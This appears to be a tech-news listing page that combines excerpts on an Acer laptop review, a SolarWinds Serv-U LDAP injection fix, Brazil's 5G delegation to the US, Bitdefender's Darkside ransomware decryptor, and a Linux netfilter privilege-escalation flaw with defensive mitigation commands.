Acer Swift 16 AI <!–> ZDNET’s key takeaways The Acer Swift 16 AI is regularly priced at $1,250. Its 16-inch OLED display, well-designed lightweight form, and marathon battery work together to create a laptop that feels more premium than its price would suggest. Its speakers, however, leave much to be desired, and it has its […] More

Microsoft researchers have discovered a previously undisclosed vulnerability in the SolarWinds Serv-U software while monitoring threats related to Log4J vulnerabilities. Jonathan Bar Or explained on Twitter that while he was hunting for a Log4J exploit attempt, he noticed attacks coming from serv-u.exe. 

more Log4j

“Taking a closer looked revealed you could feed Ssrv-U with data and it’ll build a LDAP query with your unsanitized input! This could be used for log4j attack attempts, but also for LDAP injection,” he wrote. “Solarwinds immediately responded, investigated and fixed the #vulnerability. Their response is the quickest I’ve seen, really amazing work on their part!”Microsoft later released a blog about the issue, tracked as as CVE-2021-35247, and said it is an “input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.”In their advisory, SolarWinds said the Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized.”SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream affect has been detected as the LDAP servers ignored improper characters,” the company said, adding that it affects 15.2.5 and previous versions. 

NTT Application Security’s Ray Kelly told ZDNet that the vulnerability surprised and concerned him considering SolarWinds is fresh on the heels of their previous breach that affected thousands of customers. “Given that the Log4j disclosure was published in December, this Open Source vulnerability should have been of the utmost priority for SolarWinds. While it appears that SolarWinds was not susceptible to have the vulnerable component exploited, it’s still not something want in your software product,” Kelly said. “Most all application security products can detect the Log4j vulnerability giving developers the ability to quickly identify and fix issue.” Microsoft urged customers to apply the security updates explained in the SolarWinds advisory and said customers can use their tools to identify and remediate devices that have the vulnerability. Microsoft Defender Antivirus and Microsoft Defender for Endpoint also detect behavior related to the activity, they added. Netenrich’s John Bambenek added that Microsoft’s warning and SolarWinds’ quick response time represented a positive example of how vulnerabilities need to be dealt with.  “This is the kind of vulnerability and research cooperation we need, where a major tech company with visibility to see the attacks reaches out to the software company and a fix is rushed to production,” Bambenek said.  More

Brazilian government officials will be meeting their US counterparts and investors as part of a plan intended to speed up the process around Brazil’s upcoming 5G auction. The US visit starts today (7) and will end on Friday (11). The agenda is led by Brazil’s Ministry of Communications and includes representatives from the Ministry of Foreign Affairs, the Ministry of Defense, the Special Secretariat for Strategic Affairs, the National Congress, as well as senators Ciro Nogueira and Flávio Bolsonaro, president Jair Bolsonaro’s son. Other participants of the meetings in the US are representatives from the Brazilian Intelligence Agency, as well as ministers and technical staff from the Federal Court of Auditors, which is current analyzing the notice for the auction for the 5G spectrum, expected to take place in July.

The aim of the visit, according to the Ministry of Communications, is to “learn more about regulatory approaches to private communications networks and their implementation, as well as sharing experiences around cybersecurity”. During the meetings in Washington and New York, the ministers will visit the US Department of Defense, as well as the Department of National Intelligence and the Federal Communications Commission. According to Communications minister Fabio Faria, the meetings in the US are “a great solution” to expedite the 5G auction, since the Federal Court of Auditors will have the opportunity to have their questions in relation to the fifth-generation spectrum answered, especially when it comes to the implementation of the government’s private network. Another goal of the visit is to “promote the dialog with potential investors in the Brazilian telecommunications market”, the Ministry noted. The Brazilian government officials have meetings set up with Motorola, Qualcomm, IBM and AT&T, as well as investment funds and banks, as well as consulting firm Eurasia. The Brazilian government’s US visit this week follows a previous tour led by the Ministry of Communications to some of the leading countries in the 5G space. During the visit, which took place in February, government officials visited Sweden, Finland, Japan and China. At the time, the Brazilian delegation visited companies such as Nokia and Ericsson in their home countries, and new meetings with these two companies will take place during the US visit. More

Image: Maria Ten
Cybersecurity firm Bitdefender has released today a free tool that can help victims of the Darkside ransomware recover their encrypted files for free, without paying the ransom demand.
The tool, available for download from the Bitdefender site, along with usage instructions, gives hope to companies that had important files locked and ransomed by one of today’s most sophisticated ransomware operations.
Background into the Darkside group
Active since the summer of 2020, the Darkside group launched and still operates today through ads posted on cybercrime forums.

Image Digital Shadows
The group uses a well-established Ransomware-as-a-Service (RaaS) model to partner with other cybercrime groups.
These groups would apply for the Darkside RaaS and receive a fully functional version of the Darkside ransomware. They would then breach companies using their own chosen methods, install the ransomware, and ask for huge payouts, usually in the realm of hundreds of thousands or millions of US dollars.
This modus operandi isn’t new, and it’s called “big-game hunting” because ransomware gangs usually tend to go after companies, instead of home users, in the hopes of increasing their profits.
In situations where victims didn’t want to pay, Darkside operators leak documents they stole from the victim’s network on a dedicated “leak site,” as a form of punishment and forwarning to other victims who may want to restore from backups instead of paying the crooks.

Image: ZDNet

While the Darkside hasn’t posted the names and data of any new victims on its leak site since before the winter holiday last year, the group is still believed to be active at the time of writing.
According to security researcher MalwareHunter, the most recent activity from the group is an update to its leak site last week during which the Darkside operators added a new section dedicated to journalists, where reporters could register and get in contact with the Darkside gang directly.

DarkSide ransomware’s leak website now has a “Press Center” where press people can register.Also “recovery companies” can register and then they will get more and more discounts after each clients they “helped”…Great news, right?😂@demonslay335 @VK_Intel pic.twitter.com/0wuGkbFGHK
— MalwareHunterTeam (@malwrhunterteam) January 8, 2021

While most Darkside victims have already either paid the ransom demand already or restored from backup months ago, the Darkside decrypter isn’t entirely useless, but far from it.
Will the decrypter lead to a Darkside shutdown?
First and foremost, the tool helps companies recover important files that were encrypted months before and which they weren’t able to restore but still have around, saved on backup drives.
Second, the tool also incurs operational costs to the Darkside gang, which will now have to re-do all its file encryption code to prevent free decryptions.
Third, the tool also deals a major reputational blow to the Darkside RaaS. Many ransomware operations have shut down in the past after the release of a free decrypter, as most of their customers abandoned them for newer and non-decryptable competitors.
As for the victims themselves, the good news is that the free decrypter released today by Bitdefender should, in theory, work for all recent versions of the Darkside ransomware, regardless of the file extension that crooks added at the end of each encrypted file.
This extension is unique per victim, as it’s computed from local characteristics, but that shouldn’t be a problem, Bitdefender said. More

Behind almost all Linux firewalls tools such as iptables; its newer version, nftables; firewalld; and ufw, is netfilter, which controls access to and from Linux’s network stack. It’s an essential Linux security program, so when a security hole is found in it, it’s a big deal. 

Nick Gregory, a Sophos threat researcher, found this hole recently while checking netfilter for possible security problems. Gregory explains in great detail his bug hunt, and I recommend it for those who want insight into finding C errors. But, for those of you who just want to cut to the chase, here’s the story.This is a serious bug. Specifically, it’s a heap out-of-bounds write problem with the kernel’s netfilter. Gregory said it’s ” exploitable to achieve kernel code execution (via ROP [return-oriented programming]), giving full local privilege escalation, container escape, whatever you want.” Yuck!This problem exists because netfilter doesn’t handle its hardware offload feature correctly. A local, unprivileged attacker can use this to cause a denial-of-service (DoS), execute arbitrary code, and cause general mayhem. Adding insult to injury, this works even if the hardware being attacked doesn’t have offload functionality! That’s because, as Gregory wrote to a security list, “Despite being in code dealing with hardware offload, this is reachable when targeting network devices that don’t have offload functionality (e.g. lo) as the bug is triggered before the rule creation fails.”Also: The best Linux distros for beginners: You can do this!This vulnerability is present in the Linux kernel versions 5.4 through 5.6.10. It’s listed as Common Vulnerabilities and Exposures (CVE-2022-25636), and with a Common Vulnerability Scoring System (CVSS) score of 7.8), this is a real badie. How bad? In its advisory, Red Hat  said, “This flaw allows a local attacker with a user account on the system to gain access to out-of-bounds memory, leading to a system crash or a privilege escalation threat.” So, yes, this is bad.Worse still, it affects recent major distribution releases such as Red Hat Enterprise Linux (RHEL) 8.x; Debian Bullseye; Ubuntu Linux, and SUSE Linux Enterprise 15.3. While the Linux kernel netfilter patch has been made, the patch isn’t available yet in all distribution releases.If you don’t have a patch yet, you can mitigate the problem in the RHEL family with the commands:# echo 0 > /proc/sys/user/max_user_namespaces# sudo sysctl –systemAnd, in the Debian/Ubuntu family with the command:$ sudo sysctl kernel.unprivileged_userns_clone=0So, here we are again. I’ve not seen a good exploit of this, but I have seen one that works about half the time. If you don’t want to see your Linux servers stolen out from underneath you or just knocked off the net, it’s time to either patch your system or lock it down to avoid trouble.See also More